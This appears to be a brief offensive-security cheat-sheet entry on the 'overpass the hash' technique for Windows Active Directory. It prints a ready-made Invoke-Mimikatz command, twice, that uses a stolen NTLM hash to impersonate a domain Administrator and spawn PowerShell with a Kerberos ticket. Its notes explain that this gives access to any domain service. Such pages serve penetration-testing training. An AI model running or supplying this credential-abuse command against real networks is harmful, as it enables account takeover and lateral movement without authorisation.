Overpass the Hash
General
Exploitation with Invoke-Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:<HASH> /run:powershell.exe"'Last updated
Similar to pass-the-hash
Creates valid kerberos ticket from NTLM hash of user
Able to access any domain service and not just services that support NTLM authentication like in PTH attacks
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:<HASH> /run:powershell.exe"'Last updated